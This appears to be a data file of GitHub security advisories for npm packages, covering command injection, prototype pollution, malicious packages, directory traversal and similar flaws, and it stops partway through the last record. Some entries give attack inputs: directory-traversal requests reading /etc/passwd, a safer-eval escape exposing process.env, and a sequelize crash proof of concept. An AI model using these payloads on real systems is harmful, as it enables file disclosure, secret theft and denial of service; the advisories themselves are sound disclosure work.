Command Injection in killport
|
This affects the package killport before 1.0.2. If (attacker-controlled) user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization. Running this PoC will cause the command touch success to be executed, leading to the creation of a file called success.
|
{'CVE-2021-23360'}
|
2021-03-22T18:24:32Z
|
2021-04-13T15:16:20Z
|
HIGH
| null |
{'CWE-77'}
|
{'https://github.com/ssnau/killport/commit/bec8e371f170a12e11cd222ffc7a6e1ae9942638', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23360', 'https://github.com/ssnau/killport/blob/5268f23ea8f152e47182b263d8f7ef20c12a9f28/index.js%23L9', 'https://snyk.io/vuln/SNYK-JS-KILLPORT-1078535'}
| null |
npm
|
GHSA-v3jv-wrf4-5845
|
Local Privilege Escalation in npm
|
Affected versions of `npm` use predictable temporary file names during archive unpacking. If an attacker can create a symbolic link at the location of one of these temporary file names, the attacker can arbitrarily write to any file that the user which owns the `npm` process has permission to write to, potentially resulting in local privilege escalation.
## Recommendation
Update to version 1.3.3 or later.
|
{'CVE-2013-4116'}
|
2021-09-23T21:38:18Z
|
2020-09-01T16:03:34Z
|
LOW
| null |
{'CWE-59'}
|
{'https://www.npmjs.com/advisories/152', 'https://nvd.nist.gov/vuln/detail/CVE-2013-4116', 'http://www.securityfocus.com/bid/61083', 'https://github.com/npm/npm/commit/f4d31693', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/87141', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=715325', 'http://www.openwall.com/lists/oss-security/2013/07/10/17', 'https://github.com/npm/npm/issues/3635', 'https://bugzilla.redhat.com/show_bug.cgi?id=983917', 'https://github.com/npm/npm', 'http://www.openwall.com/lists/oss-security/2013/07/11/9'}
| null |
npm
|
GHSA-5pg7-v24c-9rp9
|
Prototype pollution in controlled-merge
|
Prototype pollution vulnerability in 'controlled-merge' versions 1.0.0 through 1.2.0 allows attacker to cause a denial of service and may lead to remote code execution.
|
{'CVE-2020-28268'}
|
2021-04-19T22:11:46Z
|
2021-05-18T01:53:46Z
|
HIGH
| null |
{'CWE-1321'}
|
{'https://github.com/hlfshell/controlled-merge/commit/5a4b2e9ffe5a0be7f8843d4ab038599d3ae5f9d4', 'https://www.npmjs.com/package/controlled-merge', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28268', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28268'}
| null |
npm
|
GHSA-hq8g-qq57-5275
|
SQL Injection in untitled-model
|
All versions of `untitled-model` re vulnerable to SQL Injection. Query parameters are not properly sanitized allowing attackers to inject SQL statements and execute arbitrary SQL queries.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
| null |
2020-08-31T18:43:13Z
|
2020-09-11T21:24:33Z
|
HIGH
| null |
{'CWE-89'}
|
{'https://hackerone.com/reports/507222', 'https://www.npmjs.com/advisories/989'}
| null |
npm
|
GHSA-mq7g-6rv4-pj95
|
Downloads Resources over HTTP in embedza
|
Affected versions of `embedza` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `embedza`.
## Recommendation
Update to version 1.2.4 or later.
|
{'CVE-2016-10569'}
|
2021-01-08T18:26:10Z
|
2019-02-18T23:35:23Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://github.com/advisories/GHSA-mq7g-6rv4-pj95', 'https://nodesecurity.io/advisories/187', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10569', 'https://www.npmjs.com/advisories/187'}
| null |
npm
|
GHSA-crr2-ph72-c52g
|
Malicious Package in my-very-own-package
|
All versions of `my-very-own-package` contain malicious code. The package sends the output of `process.versions`, `process.arch` and `process.platform` to a remote server in a postinstall script.
## Recommendation
Remove the package from your environment. There are no further signs of compromise.
| null |
2021-09-30T17:44:05Z
|
2020-09-03T17:27:22Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1043'}
| null |
npm
|
GHSA-277p-xwpp-3jf7
|
Malicious Package in rrgod
|
All versions of `rrgod` are considered malicious. The package is malware designed to run arbitrary scripts. When installed, the package downloads an arbitrary file and executes its contents as a pre, post and install scripts.
## Recommendation
This package is not available on the npm Registry anymore. If you happen to find this package in your environment you should consider the system it was installed on compromised and assess if further response (such as rotating all credentials found on the compromised machine) is necessary.
| null |
2021-10-01T13:42:09Z
|
2020-09-02T15:49:22Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/764'}
| null |
npm
|
GHSA-74hh-4rcv-pp27
|
Malicious Package in bitconijs-lib
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T20:43:53Z
|
2020-09-04T16:44:19Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1370'}
| null |
npm
|
GHSA-q52j-4q2q-hcj6
|
Authentication Bypass in console-io
|
Affected versions of the `console-io` package do not configure the underlying websocket library to require authentication, resulting in an authentication bypass vulnerability. As `console-io` allows terminal access on the server via a web page, an authentication bypass is essentially remote code execution.
## Recommendation
Update to version 2.3.0 or later.
|
{'CVE-2016-10532'}
|
2021-09-16T19:31:28Z
|
2019-02-18T23:39:39Z
|
CRITICAL
| null |
{'CWE-287'}
|
{'https://www.npmjs.com/advisories/90', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10532', 'https://github.com/advisories/GHSA-q52j-4q2q-hcj6', 'https://nodesecurity.io/advisories/90'}
| null |
npm
|
GHSA-52qp-gwwh-qrg4
|
Missing Handler in @scandipwa/magento-scripts
|
### Impact
After changing the function from synchronous to asynchronous there wasn't implemented handler in the [start](https://docs.create-magento-app.com/getting-started/available-commands/start), [stop](https://docs.create-magento-app.com/getting-started/available-commands/stop), [exec](https://docs.create-magento-app.com/getting-started/available-commands/exec) and [logs](https://docs.create-magento-app.com/getting-started/available-commands/logs) commands, effectively making them unusable.
### Patches
[Version 1.5.3](https://github.com/scandipwa/create-magento-app/releases/tag/%40scandipwa%2Fmagento-scripts%401.5.3) contains patches for the problems described above.
### Workarounds
Upgrade to patched or latest (recommended) version `npm i @scandipwa/magento-scripts@1.5.3` or `npm i @scandipwa/magento-scripts@latest`.
### References
New releases always available here: https://github.com/scandipwa/create-magento-app/releases
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [create-magento-app](https://github.com/scandipwa/create-magento-app/issues)
|
{'CVE-2021-32684'}
|
2021-06-16T20:15:07Z
|
2021-06-21T17:10:02Z
|
MODERATE
| null |
{'CWE-670'}
|
{'https://github.com/scandipwa/create-magento-app/security/advisories/GHSA-52qp-gwwh-qrg4', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32684', 'https://github.com/scandipwa/create-magento-app/commit/89115db7031e181eb8fb4ec2822bc6cab88e7071'}
| null |
npm
|
GHSA-j6w4-pg6p-5mrv
|
Directory Traversal in tmock
|
`tmock` is a static file server.
`tmock` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url.
Example Request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host: localhost
```
and server Response:
```
HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked
{contents of /etc/passwd}
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16106'}
|
2020-08-31T18:20:53Z
|
2018-07-23T23:51:04Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://github.com/advisories/GHSA-j6w4-pg6p-5mrv', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/tmock', 'https://nodesecurity.io/advisories/375', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16106', 'https://www.npmjs.com/advisories/375'}
| null |
npm
|
GHSA-6584-gfwm-3vc3
|
Malicious Package in budfer-xor
|
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-29T20:54:03Z
|
2020-09-03T21:43:01Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1233'}
| null |
npm
|
GHSA-g4xp-36c3-f7mr
|
Hidden Directories Always Served in inert
|
Versions 1.1.1 and earlier of `inert` are vulnerable to an information leakage vulnerability which causes files in hidden directories to be served, even when showHidden is false.
The inert directory handler always allows files in hidden directories to be served, even when `showHidden` is false.
## Recommendation
Update to version >= 1.1.1.
|
{'CVE-2014-10068'}
|
2020-08-31T18:07:50Z
|
2020-08-31T22:47:41Z
|
MODERATE
| null |
{'CWE-22'}
|
{'https://nodesecurity.io/advisories/14', 'https://nvd.nist.gov/vuln/detail/CVE-2014-10068', 'https://github.com/hapijs/inert/pull/15', 'https://github.com/hapijs/inert/commit/e8f99f94da4cb08e8032eda984761c3f111e3e82', 'https://www.npmjs.com/advisories/14'}
| null |
npm
|
GHSA-mpjm-v997-c4h4
|
Sandboxed renderers can obtain thumbnails of arbitrary files through the nativeImage API
|
### Impact
This vulnerability allows a sandboxed renderer to request a "thumbnail" image of an arbitrary file on the user's system. The thumbnail can potentially include significant parts of the original file, including textual data in many cases.
All current stable versions of Electron are affected.
### Patches
This was fixed with #30728, and the following Electron versions contain the fix:
- 15.0.0-alpha.10
- 14.0.0
- 13.3.0
- 12.1.0
- 11.5.0
### Workarounds
If your app enables `contextIsolation`, this vulnerability is significantly more difficult for an attacker to exploit.
Further, if your app does not depend on the `createThumbnailFromPath` API, then you can simply disable the functionality. In the main process, before the 'ready' event:
```js
delete require('electron').nativeImage.createThumbnailFromPath
```
### For more information
If you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org).
|
{'CVE-2021-39184'}
|
2021-10-12T18:54:44Z
|
2021-10-12T21:59:13Z
|
MODERATE
| null |
{'CWE-668'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-39184', 'https://github.com/electron/electron/security/advisories/GHSA-mpjm-v997-c4h4', 'https://github.com/electron/electron', 'https://github.com/electron/electron/pull/30728', 'https://github.com/electron/electron/pull/30728/commits/8fed645bd671f359ee52d806c075ec4e07eda17f'}
| null |
npm
|
GHSA-c6pw-q7f2-97hv
|
Privilege Escalation in cordova-plugin-inappbrowser
|
Versions of `cordova-plugin-inappbrowser` prior to 3.1.0 are vulnerable to Privilege Escalation. A website running in the InAppBrowser webview on Android could execute arbitrary JavaScript in the main application's webview using a specially crafted gap-iab: URI. This affects Cordova Android applications using the package.
## Recommendation
Upgrade to version 3.1.0 or later.
|
{'CVE-2019-0219'}
|
2021-06-15T17:25:24Z
|
2020-09-04T17:57:43Z
|
CRITICAL
| null |
{'CWE-79'}
|
{'http://www.openwall.com/lists/oss-security/2019/11/28/1', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://lists.apache.org/thread/4vtg0trdrh5203dktt4f3vkd5z2d5ndj', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://www.npmjs.com/advisories/1467', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0219', 'https://lists.apache.org/thread.html/197482d5ab80c0bff4a5ec16e1b0466df38389d9a4b5331d777f14fc%40%3Cdev.cordova.apache.org%3E'}
| null |
npm
|
GHSA-pc5p-h8pf-mvwp
|
Machine-In-The-Middle in https-proxy-agent
|
Versions of `https-proxy-agent` prior to 2.2.3 are vulnerable to Machine-In-The-Middle. The package fails to enforce TLS on the socket if the proxy server responds the to the request with a HTTP status different than 200. This allows an attacker with access to the proxy server to intercept unencrypted communications, which may include sensitive information such as credentials.
## Recommendation
Upgrade to version 3.0.0 or 2.2.3.
| null |
2021-08-23T15:27:24Z
|
2020-04-16T03:14:56Z
|
MODERATE
| null |
{'CWE-300'}
|
{'https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b', 'https://hackerone.com/reports/541502', 'https://www.npmjs.com/advisories/1184', 'https://snyk.io/vuln/SNYK-JS-HTTPSPROXYAGENT-469131'}
| null |
npm
|
GHSA-7xrj-f5rp-j55h
|
Uncontrolled Resource Consumption in transpile
|
All versions of package transpile are vulnerable to Denial of Service (DoS) due to a lack of input sanitization or whitelisting, coupled with improper exception handling in the .to() function.
|
{'CVE-2021-23429'}
|
2021-08-25T19:32:59Z
|
2021-09-02T17:10:42Z
|
MODERATE
| null |
{'CWE-400', 'CWE-755'}
|
{'https://snyk.io/vuln/SNYK-JS-TRANSPILE-1290774', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23429', 'https://github.com/stealjs/transpile', 'https://github.com/stealjs/transpile/blob/56aaeb26f69496e45a60c03dc92653d53021d4ac/main.js%23L53'}
| null |
npm
|
GHSA-4c7m-wxvm-r7gc
|
Improper parsing of octal bytes in netmask
|
Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
:exclamation: NOTE: The fix for this issue was incomplete. A subsequent fix was made in version `2.0.1` which was assigned [CVE-2021-29418 / GHSA-pch5-whg9-qr2r](https://github.com/advisories/GHSA-pch5-whg9-qr2r). For complete protection from this vulnerability an upgrade to version 2.0.1 or later is recommended.
|
{'CVE-2021-28918'}
|
2022-04-01T20:21:55Z
|
2021-04-14T15:03:16Z
|
CRITICAL
| null |
{'CWE-20'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-28918', 'https://github.com/rs/node-netmask/', 'https://github.com/advisories/GHSA-pch5-whg9-qr2r', 'https://rootdaemon.com/2021/03/29/vulnerability-in-netmask-npm-package-affects-280000-projects/', 'https://security.netapp.com/advisory/ntap-20210528-0010/', 'https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md', 'https://github.com/rs/node-netmask/blob/98294cb20695f2c6c36219a4fbcd4744fb8d0682/CHANGELOG.md#v110-mar-18-2021', 'https://www.npmjs.com/package/netmask', 'https://www.bleepingcomputer.com/news/security/critical-netmask-networking-bug-impacts-thousands-of-applications/'}
| null |
npm
|
GHSA-779f-wgxg-qr8f
|
Prototype Pollution in lodash.mergewith
|
Versions of `lodash.mergewith` before 4.6.2 are vulnerable to prototype pollution. The function `mergeWith` may allow a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.
## Recommendation
Update to version 4.6.2 or later.
| null |
2020-08-31T18:46:16Z
|
2020-09-03T18:10:22Z
|
HIGH
| null |
{'CWE-1321'}
|
{'https://www.npmjs.com/advisories/1071'}
| null |
npm
|
GHSA-28hp-fgcr-2r4h
|
Cross-Site Scripting via JSONP
|
JSONP allows untrusted resource URLs, which provides a vector for attack by malicious actors.
| null |
2021-02-24T18:32:36Z
|
2019-06-27T17:25:42Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/angular/angular.js/commit/6476af83cd0418c84e034a955b12a842794385c4', 'https://www.npmjs.com/advisories/1630'}
| null |
npm
|
GHSA-3r8w-mphv-2f3f
|
Prototype Pollution
|
All versions of package lutils are vulnerable to Prototype Pollution via the main (merge) function.
|
{'CVE-2021-23396'}
|
2021-06-18T18:35:57Z
|
2021-06-21T17:12:25Z
|
MODERATE
| null |
{'CWE-1321'}
|
{'https://snyk.io/vuln/SNYK-JS-LUTILS-1311023', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23396'}
| null |
npm
|
GHSA-mgr2-3mpv-43gc
|
Downloads Resources over HTTP in openframe-image
|
Affected versions of `openframe-image` insecurely downloads resources over HTTP.
In scenarios where an attacker has a privileged network position, they can modify or read such resources at will. While the exact severity of impact for a vulnerability like this is highly variable and depends on the behavior of the package itself, it ranges from being able to read sensitive information all the way up to and including remote code execution.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10616'}
|
2021-09-16T20:55:30Z
|
2019-02-18T23:47:37Z
|
HIGH
| null |
{'CWE-269', 'CWE-311'}
|
{'https://nodesecurity.io/advisories/218', 'https://github.com/OpenframeProject/Openframe-Image', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10616', 'https://www.npmjs.com/advisories/218', 'https://github.com/advisories/GHSA-mgr2-3mpv-43gc'}
| null |
npm
|
GHSA-r659-8xfp-j327
|
Prototype Pollution in objection.js
|
objection.js prior to version 2.2.16 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'). This issue is patched in version 2.2.16.
|
{'CVE-2021-3766'}
|
2021-10-08T20:12:33Z
|
2021-09-07T23:09:43Z
|
CRITICAL
| null |
{'CWE-915', 'CWE-1321'}
|
{'https://github.com/Vincit/objection.js/commit/46b842a6bc897198b83f41ac85c92864b991d7e9', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3766', 'https://huntr.dev/bounties/c98e0f0e-ebf2-4072-be73-a1848ea031cc', 'https://github.com/vincit/objection.js/commit/b41aab8dcd78f426f7468dcda541a7aca18a66a6', 'https://github.com/vincit/objection.js'}
| null |
npm
|
GHSA-773h-w45w-f2f9
|
Denial of service vulnerability exists in libxmljs
|
libxmljs provides libxml bindings for v8 javascript engine. This affects all versions of package libxmljs. When invoking the libxmljs.parseXml function with a non-buffer argument the V8 code will attempt invoking the .toString method of the argument. If the argument's toString value is not a Function object V8 will crash.
|
{'CVE-2022-21144'}
|
2022-05-04T14:48:04Z
|
2022-05-03T00:00:46Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-21144', 'https://github.com/libxmljs/libxmljs/commit/2501807bde9b38cfaed06d1e140487516d91379d', 'https://github.com/libxmljs/libxmljs/pull/594', 'https://github.com/libxmljs/libxmljs', 'https://snyk.io/vuln/SNYK-JS-LIBXMLJS-2348756'}
| null |
npm
|
GHSA-6gww-qpm6-mc2g
|
Server-Side Request Forgery in ssrf-agent
|
The package ssrf-agent before 1.0.5 are vulnerable to Server-side Request Forgery (SSRF) via the defaultIpChecker function. It fails to properly validate if the IP requested is private.
|
{'CVE-2021-23718'}
|
2021-11-29T15:08:38Z
|
2021-12-02T17:51:51Z
|
MODERATE
| null |
{'CWE-918'}
|
{'https://security.netapp.com/advisory/ntap-20211203-0005/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23718', 'https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346', 'https://github.com/welefen/ssrf-agent/blob/cec2b85fe8886ad6926a247a3e059d8369ec022b/index.js%23L13', 'https://github.com/welefen/ssrf-agent', 'https://snyk.io/vuln/SNYK-JS-SSRFAGENT-1584362'}
| null |
npm
|
GHSA-gfj6-p24g-6hpm
|
Malicious Package in jc-sha3
|
Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-30T16:35:07Z
|
2020-09-03T22:55:06Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1277'}
| null |
npm
|
GHSA-h9v8-rm3m-5h5f
|
OS Command Injection in git-add-remote
|
git-add-remote through 1.0.0 is vulnerable to Command Injection. It allows execution of arbitrary commands via the name argument.
|
{'CVE-2020-7630'}
|
2021-07-28T22:39:13Z
|
2022-02-10T23:47:47Z
|
CRITICAL
| null |
{'CWE-78'}
|
{'https://snyk.io/vuln/SNYK-JS-GITADDREMOTE-564269', 'https://github.com/jonschlinkert/git-add-remote/blob/master/index.js#L21,', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7630'}
| null |
npm
|
GHSA-96qc-ghj4-rq27
|
Directory Traversal in yttivy
|
Affected versions of `yttivy` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16219'}
|
2020-08-31T18:23:16Z
|
2020-09-01T18:24:56Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://nodesecurity.io/advisories/441', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16219', 'https://www.npmjs.com/advisories/441', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/yttivy'}
| null |
npm
|
GHSA-wj36-v8j4-pc7c
|
Low severity vulnerability that affects express-cart
|
A deficiency in the access control in module express-cart <=1.1.5 allows unprivileged users to add new users to the application as administrators.
|
{'CVE-2018-16483'}
|
2021-09-21T21:12:02Z
|
2019-02-07T18:16:03Z
|
HIGH
| null |
{'CWE-290'}
|
{'https://github.com/advisories/GHSA-wj36-v8j4-pc7c', 'https://hackerone.com/reports/343626', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16483'}
| null |
npm
|
GHSA-vqmr-957g-r7w3
|
High severity vulnerability that affects rendertron
|
Installed packages are exposed by node_modules in Rendertron 1.0.0, allowing remote attackers to read absolute paths on the server by examining the "_where" attribute of package.json files.
|
{'CVE-2017-18355'}
|
2021-09-20T22:15:14Z
|
2019-02-12T15:36:39Z
|
HIGH
| null |
{'CWE-200'}
|
{'https://github.com/GoogleChrome/rendertron', 'https://nvd.nist.gov/vuln/detail/CVE-2017-18355', 'https://github.com/GoogleChrome/rendertron/pull/88', 'https://bugs.chromium.org/p/chromium/issues/detail?id=759111', 'https://github.com/advisories/GHSA-vqmr-957g-r7w3', 'https://github.com/GoogleChrome/rendertron/commit/8d70628c96ae72eff6eebb451d26fc9ed6b58b0e'}
| null |
npm
|
GHSA-vm6v-w6q2-mrrq
|
Malicious Package in bb-builder
|
All versions of `bb-builder` contained malicious code. The package ran an executable targeting Windows and uploaded information to a remote server.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-09-30T20:09:24Z
|
2020-09-03T19:20:05Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1119'}
| null |
npm
|
GHSA-m362-87jc-f39v
|
Directory Traversal in uv-tj-demo
|
Affected versions of `uv-tj-demo` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16200'}
|
2020-08-31T18:22:45Z
|
2020-09-01T18:16:24Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://nodesecurity.io/advisories/428', 'https://www.npmjs.com/advisories/428', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/uv-tj-demo', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16200'}
| null |
npm
|
GHSA-82gw-pqf7-q3j2
|
High severity vulnerability that affects pym.js
|
NPR Visuals Team Pym.js version versions 0.4.2 up to 1.3.1 contains a Cross Site Request Forgery (CSRF) vulnerability in Pym.js _onNavigateToMessage function.
https://github.com/nprapps/pym.js/blob/master/src/pym.js#L573 that can result in Arbitrary javascript code execution. This attack appear to be exploitable via Attacker gains full javascript access to pages with Pym.js embeds when user visits an attacker crafted page.. This vulnerability appears to have been fixed in versions 1.3.2 and later.
|
{'CVE-2018-1000086'}
|
2021-09-03T21:50:02Z
|
2018-03-13T20:38:51Z
|
HIGH
| null |
{'CWE-352'}
|
{'https://github.com/nprapps/pym.js', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000086', 'http://blog.apps.npr.org/2018/02/15/pym-security-vulnerability.html', 'https://github.com/advisories/GHSA-82gw-pqf7-q3j2', 'https://github.com/nprapps/pym.js/issues/170'}
| null |
npm
|
GHSA-c5hm-xc74-pqrg
|
OS Command Injection in jscover
|
jscover through 1.0.0 is vulnerable to Command Injection. It allows execution of arbitrary command via the source argument.
|
{'CVE-2020-7623'}
|
2021-07-28T21:54:19Z
|
2022-02-10T23:37:22Z
|
CRITICAL
| null |
{'CWE-78'}
|
{'https://github.com/node-modules/jscover/blob/master/lib/jscover.js#L59,', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7623', 'https://snyk.io/vuln/SNYK-JS-JSCOVER-564250'}
| null |
npm
|
GHSA-hjgp-8ffr-hwwr
|
Downloads Resources over HTTP in closurecompiler
|
Affected versions of `closurecompiler` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `closurecompiler`.
## Recommendation
Update to version 1.6.1 or later.
|
{'CVE-2016-10582'}
|
2021-01-08T18:40:45Z
|
2019-02-18T23:51:19Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://nodesecurity.io/advisories/169', 'https://www.npmjs.com/advisories/169', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10582', 'https://github.com/advisories/GHSA-hjgp-8ffr-hwwr', 'https://github.com/dcodeIO/ClosureCompiler.js/commit/e59848f5975e5b15279c044daf9cff8ff192bae6'}
| null |
npm
|
GHSA-762c-v946-pf25
|
Malicious Package in bpi39
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T20:44:46Z
|
2020-09-04T16:47:33Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1373'}
| null |
npm
|
GHSA-r3x4-wr4h-pw33
|
Sandbox Breakout / Arbitrary Code Execution in safer-eval
|
Versions of `safer-eval` prior to 1.3.4 are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload using constructor properties can escape the sandbox and execute arbitrary code. For example, evaluating he string `console.constructor.constructor('return process')().env` prints `process.env` to the console.
## Recommendation
Upgrade to version 1.3.4 or later.
|
{'CVE-2019-10759'}
|
2021-07-27T22:20:06Z
|
2019-10-21T21:58:34Z
|
CRITICAL
| null |
{'CWE-94'}
|
{'https://www.npmjs.com/advisories/1021', 'https://snyk.io/vuln/SNYK-JS-SAFEREVAL-173772', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10759'}
| null |
npm
|
GHSA-455m-q3h9-34pf
|
Downloads Resources over HTTP in windows-seleniumjar-mirror
|
Affected versions of `windows-seleniumjar-mirror` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `windows-seleniumjar-mirror`.
## Recommendation
No patch is currently available for this vulnerability.
Currently, the best mitigation is to download the selenium jar file manually from [seleniumHQ](https://www.seleniumhq.org/download/).
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10670'}
|
2021-01-08T21:17:34Z
|
2019-02-18T23:44:29Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://nodesecurity.io/advisories/281', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10670', 'https://github.com/advisories/GHSA-455m-q3h9-34pf', 'https://www.npmjs.com/advisories/281'}
| null |
npm
|
GHSA-mc7w-4cjf-c973
|
OS Command Injection in node-opencv
|
utils/find-opencv.js in node-opencv (aka OpenCV bindings for Node.js) prior to 6.1.0 is vulnerable to Command Injection. It does not validate user input allowing attackers to execute arbitrary commands.
|
{'CVE-2019-10061'}
|
2021-10-07T19:30:03Z
|
2021-10-12T22:06:57Z
|
CRITICAL
| null |
{'CWE-78'}
|
{'https://github.com/peterbraden/node-opencv/', 'https://www.npmjs.com/advisories/789', 'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b', 'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10061', 'https://www.npmjs.com/package/opencv'}
| null |
npm
|
GHSA-fw4p-36j9-rrj3
|
Denial of Service in sequelize
|
Versions of `sequelize` prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a `TypeError` exception for the `results` variable. The `results` value may be undefined and trigger the error on a `.map` call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.
The following proof-of-concept crashes the Node process:
```
const Sequelize = require('sequelize');
const sequelize = new Sequelize({
dialect: 'sqlite',
storage: 'database.sqlite'
});
const TypeError = sequelize.define('TypeError', {
name: Sequelize.STRING,
});
TypeError.sync({force: true}).then(() => {
return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});
```
## Recommendation
